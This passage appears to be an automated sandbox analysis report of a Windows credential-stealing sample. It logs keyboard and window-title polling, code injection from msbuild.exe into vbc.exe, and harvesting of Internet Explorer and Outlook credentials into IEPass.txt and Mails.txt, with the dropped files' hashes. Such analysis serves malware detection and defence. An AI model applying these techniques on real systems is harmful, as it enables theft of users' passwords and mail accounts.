Keyboard Read virtual_key_code = VK_MENU, result_out = -127 True 1
Fn
Keyboard Read virtual_key_code = VK_CAPITAL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = -127 True 1
Fn
Keyboard Read result_out = 1 True 1
Fn
System Get foreground window - True 1
Fn
Keyboard Get Info type = KB_LOCALE_ID, os_tid = 1120, result_out = 67699721 True 1
Fn
System Get foreground window - True 1
Fn
System Get window text window_text = 2550884 True 1
Fn
System Get foreground window - True 1
Fn
System Get window text window_text = 2550884 False 1
Fn
System Get foreground window - True 1
Fn
System Get window text window_text = 2550884 False 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = -127 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = -127 True 1
Fn
System Get foreground window - True 1
Fn
System Get window text window_text = 2550884 True 1
Fn
System Get foreground window - True 1
Fn
System Get window text window_text = 2550884 True 1
Fn
System Get foreground window - True 1
Fn
System Get window text window_text = 2550884 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 1 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 1 True 1
Fn
System Get foreground window - True 1
Fn
System Get window text window_text = 2550884 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 1 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 1 True 1
Fn
System Get foreground window - True 1
Fn
System Get window text window_text = 2550884 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 1 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 1 True 1
Fn
Thread 0xb2c
1 0
Category Operation Information Success Count Logfile
Thread 0xb7c
5 0
Category Operation Information Success Count Logfile
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 5
Fn
Thread 0xb80
52 0
Category Operation Information Success Count Logfile
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
Module Load module_name = C:\Windows\Microsoft.NET\Framework\v2.0.50727\\wminet_utils.dll, base_address = 0x6a310000 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = ResetSecurity, address_out = 0x6a311944 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = SetSecurity, address_out = 0x6a311986 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = BlessIWbemServices, address_out = 0x6a3119cc True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = BlessIWbemServicesObject, address_out = 0x6a311a1e True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetPropertyHandle, address_out = 0x6a311a70 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = WritePropertyValue, address_out = 0x6a311a89 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = Clone, address_out = 0x6a311aa2 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = VerifyClientKey, address_out = 0x6a312270 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetQualifierSet, address_out = 0x6a311d73 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = Get, address_out = 0x6a311b96 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = Put, address_out = 0x6a311b7a True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = Delete, address_out = 0x6a311bb5 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetNames, address_out = 0x6a311bc8 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = BeginEnumeration, address_out = 0x6a311be4 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = Next, address_out = 0x6a311bf7 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = EndEnumeration, address_out = 0x6a311c16 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetPropertyQualifierSet, address_out = 0x6a311c26 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = Clone, address_out = 0x6a311aa2 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetObjectText, address_out = 0x6a311c3c True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = SpawnDerivedClass, address_out = 0x6a311c52 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = SpawnInstance, address_out = 0x6a311c68 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = CompareTo, address_out = 0x6a311c7e True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetPropertyOrigin, address_out = 0x6a311c94 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = InheritsFrom, address_out = 0x6a311caa True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetMethod, address_out = 0x6a311cbd True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = PutMethod, address_out = 0x6a311cd9 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = DeleteMethod, address_out = 0x6a311cf5 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = BeginMethodEnumeration, address_out = 0x6a311d08 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = NextMethod, address_out = 0x6a311d1b True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = EndMethodEnumeration, address_out = 0x6a311d37 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetMethodQualifierSet, address_out = 0x6a311d47 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetMethodOrigin, address_out = 0x6a311d5d True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = QualifierSet_Get, address_out = 0x6a311d86 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = QualifierSet_Put, address_out = 0x6a311da2 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = QualifierSet_Delete, address_out = 0x6a311dbb True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = QualifierSet_GetNames, address_out = 0x6a311dce True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = QualifierSet_BeginEnumeration, address_out = 0x6a311de4 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = QualifierSet_Next, address_out = 0x6a311df7 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = QualifierSet_EndEnumeration, address_out = 0x6a311e13 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetCurrentApartmentType, address_out = 0x6a311d73 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetDemultiplexedStub, address_out = 0x6a3118fd True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = CreateInstanceEnumWmi, address_out = 0x6a311580 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = CreateClassEnumWmi, address_out = 0x6a3115f6 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = ExecQueryWmi, address_out = 0x6a31169e True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = ExecNotificationQueryWmi, address_out = 0x6a311717 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = PutInstanceWmi, address_out = 0x6a311790 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = PutClassWmi, address_out = 0x6a311810 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = CloneEnumWbemClassObject, address_out = 0x6a311890 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = ConnectServerWmi, address_out = 0x6a3124b7 True 1
Fn
COM Create interface = DC12A687-737F-11CF-884D-00AA004B2E24, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Thread 0xbc4
19 0
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2019-07-22 00:25:10 (UTC) True 1
Fn
System Get Time type = System Time, time = 2019-07-22 00:25:11 (UTC) True 1
Fn
System Get Time type = System Time, time = 2019-07-22 00:25:12 (UTC) True 1
Fn
System Get Time type = System Time, time = 2019-07-22 00:25:13 (UTC) True 1
Fn
System Get Time type = System Time, time = 2019-07-22 00:25:14 (UTC) True 1
Fn
System Get Time type = System Time, time = 2019-07-22 00:25:15 (UTC) True 1
Fn
System Get Time type = System Time, time = 2019-07-22 00:25:16 (UTC) True 1
Fn
System Get Time type = System Time, time = 2019-07-22 00:25:17 (UTC) True 1
Fn
System Get Time type = System Time, time = 2019-07-22 00:25:18 (UTC) True 1
Fn
System Get Time type = System Time, time = 2019-07-22 00:25:19 (UTC) True 1
Fn
System Get Time type = System Time, time = 2019-07-22 00:25:20 (UTC) True 1
Fn
System Get Time type = System Time, time = 2019-07-22 00:25:21 (UTC) True 1
Fn
System Get Time type = System Time, time = 2019-07-22 00:25:22 (UTC) True 1
Fn
System Get Time type = System Time, time = 2019-07-22 00:25:23 (UTC) True 1
Fn
System Get Time type = System Time, time = 2019-07-22 00:25:24 (UTC) True 1
Fn
System Get Time type = System Time, time = 2019-07-22 00:25:25 (UTC) True 1
Fn
System Get Time type = System Time, time = 2019-07-22 00:25:26 (UTC) True 1
Fn
System Get Time type = System Time, time = 2019-07-22 00:25:27 (UTC) True 1
Fn
System Get Time type = System Time, time = 2019-07-22 00:25:28 (UTC) True 1
Fn
Process #4: vbc.exe
56 0
Information Value
ID #4
File Name c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe
Command Line C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe -f C:\Users\5P5NRG~1\AppData\Local\Temp\IEPass.txt
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:55, Reason: Child Process
Unmonitor End Time: 00:00:57, Reason: Self Terminated
Monitor Duration 00:00:01
OS Process Information
Information Value
PID 0xbf8
Parent PID 0xb18 (c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x BFC
0x 6BC
Memory Dumps
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA Actions
buffer 0x00400000 0x00422FFF Marked Executable - 32-bit 0x0040F046, 0x00401000, ... False False
Injection Information
Injection Type Source Process Source Os Thread ID Information Success Count Logfile
Modify Control Flow #2: c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe 0xb1c os_tid = 0xbfc True 1
Fn
Dropped Files
Filename File Size Hash Values YARA Match Actions
C:\Users\5P5NRG~1\AppData\Local\Temp\IEPass.txt 389 bytes MD5: b8ea3a8f80e92d59650fbf1e4bc84bfd
SHA1: cbeed9d5866317cabf68ab8a356094fb06d761c0
SHA256: fdaeb29c5dc8d7be90d16833ec1afadf778cefde08f5ff22b0d420fe274da0f0
SSDeep: 3:r133PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPovL1E0AN0yOAVKXRy133a:evL1NyJvVNSvrJWgOWUVFDZNJ48WUfa
False
Threads
Thread 0xbfc
56 0
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2019-07-22 00:25:12 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 17669373483 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x76c34f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x76c3359f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x76c31252 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x76c34208 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreExW, address_out = 0x76cb4195 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadStackGuarantee, address_out = 0x76c3d31f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolTimer, address_out = 0x76c4ee7e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolTimer, address_out = 0x7717441c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForThreadpoolTimerCallbacks, address_out = 0x7719c50e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolTimer, address_out = 0x7719c381 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolWait, address_out = 0x76c4f088 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolWait, address_out = 0x771805d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolWait, address_out = 0x7719ca24 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushProcessWriteBuffers, address_out = 0x77150b8c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibraryWhenCallbackReturns, address_out = 0x7720fde8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessorNumber, address_out = 0x771a1e1d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalProcessorInformation, address_out = 0x76cb4761 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSymbolicLinkW, address_out = 0x76cacd11 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetDefaultDllDirectories, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesEx, address_out = 0x76cb424f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringEx, address_out = 0x76cb46b1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatEx, address_out = 0x76cc6676 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoEx, address_out = 0x76cb4751 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatEx, address_out = 0x76cc65f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLocaleName, address_out = 0x76cb47c1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocaleName, address_out = 0x76cb47e1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 0x76cb47f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentPackageId, address_out = 0x0 False 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Get Info filename = STD_INPUT_HANDLE, type = file_type True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Get Info filename = STD_OUTPUT_HANDLE, type = file_type True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, size = 260 True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
User Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\IEPass.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\IEPass.txt, type = file_type True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer, value_name = svcVersion, data = 72, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer, value_name = Version, data = 8.0.7601.17514, type = REG_SZ True 1
Fn
System Get Info type = Operating System True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2 False 1
Fn
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\IEPass.txt, size = 389 True 1
Fn
Data
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
Module Get Handle module_name = mscoree.dll False 1
Fn
Process #5: vbc.exe
226 0
Information Value
ID #5
File Name c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe
Command Line C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:57, Reason: Child Process
Unmonitor End Time: 00:01:04, Reason: Self Terminated
Monitor Duration 00:00:06
OS Process Information
Information Value
PID 0x594
Parent PID 0xb18 (c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x4A4
0x8CC
Memory Dumps
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA Actions
buffer 0x00400000 0x0041AFFF Marked Executable - 32-bit 0x00410E58, 0x0040D6E0, ... False False
Dropped Files
Filename: C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt
File Size: 475 bytes
MD5: 0e8d54d411f43f166821d012d45b1199
SHA1: a102c887b7ee1e8f1e2555e30c1c58015248251b
SHA256: 72ee1a9d65acc2cf4fea9c11dbec1e6ee7b67fed882b5fd37d69c3692814b4df
SSDeep: 6:QAXqqq9UMe7PQDC+8ADAwzRIjMw1NAmYezRSJcnDWpSnDWAwb:QZ9UHr+8ADzRIRvGe9SJgyp6yAwb
YARA Match: False
Threads
Thread 0x4a4
226 0
Category Operation Information Success Count Logfile
Module Get Handle module_name = c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe, base_address = 0x400000 True 2
Fn
Module Load module_name = comctl32.dll, base_address = 0x73530000 True 1
Fn
Module Get Address module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = InitCommonControlsEx, address_out = 0x73536be6 True 1
Fn
Module Load module_name = shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetSpecialFolderPathA, address_out = 0x7621fb26 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, size = 260 True 1
Fn
File Get Info filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc_lng.ini, type = file_attributes False 1
Fn
System Get Info type = Operating System True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Profiles, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Thunderbird\Profiles, type = file_attributes False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Qualcomm\Eudora\CommandLine False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Classes\Software\Qualcomm\Eudora\CommandLine\current False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Thunderbird False 1
Fn
File Get Info filename = C:\Program Files (x86)\Mozilla Thunderbird, type = file_attributes False 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, size = 260 True 1
Fn
Ini Read file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.cfg, section_name = General, key_name = ShowGridLines, default_value = 0 True 1
Fn
Ini Read file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.cfg, section_name = General, key_name = SaveFilterIndex, default_value = 0 True 1
Fn
Ini Read file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.cfg, section_name = General, key_name = AddExportHeaderLine, default_value = 0 True 1
Fn
Ini Read file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.cfg, section_name = General, key_name = MarkOddEvenRows, default_value = 0 True 1
Fn
Ini Read file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.cfg, section_name = General, key_name = WinPos False 1
Fn
Ini Read file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.cfg, section_name = General, key_name = Columns False 1
Fn
Ini Read file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.cfg, section_name = General, key_name = Sort, default_value = 0 True 1
Fn
Module Load module_name = pstorec.dll, base_address = 0x73520000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\pstorec.dll, function = PStoreCreateInstance, address_out = 0x7352526c True 1
Fn
Module Load module_name = crypt32.dll, base_address = 0x759b0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptUnprotectData, address_out = 0x759e5a7f True 1
Fn
System Get Computer Name result_out = XDUWTFONO True 1
Fn
User Get Username user_name_out = 5p5NrGJn0jS HALPmcxz True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Google\Google Desktop\Mailboxes False 1
Fn
Module Load module_name = advapi32.dll, base_address = 0x74d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredReadA, address_out = 0x74d871c1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredFree, address_out = 0x74d4b2ec True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredDeleteA, address_out = 0x74d87941 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredEnumerateA, address_out = 0x74d87381 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredEnumerateW, address_out = 0x74d87481 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Identities True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Identities True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38} True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}, value_name = Username, data = Main Identity, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}\Software\Microsoft\Internet Account Manager\Accounts False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Identities False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\05cb6f136411cf4daf1f74e966b0a7dc True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\05cb6f136411cf4daf1f74e966b0a7dc False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046 True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046 False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a False 1
Fn
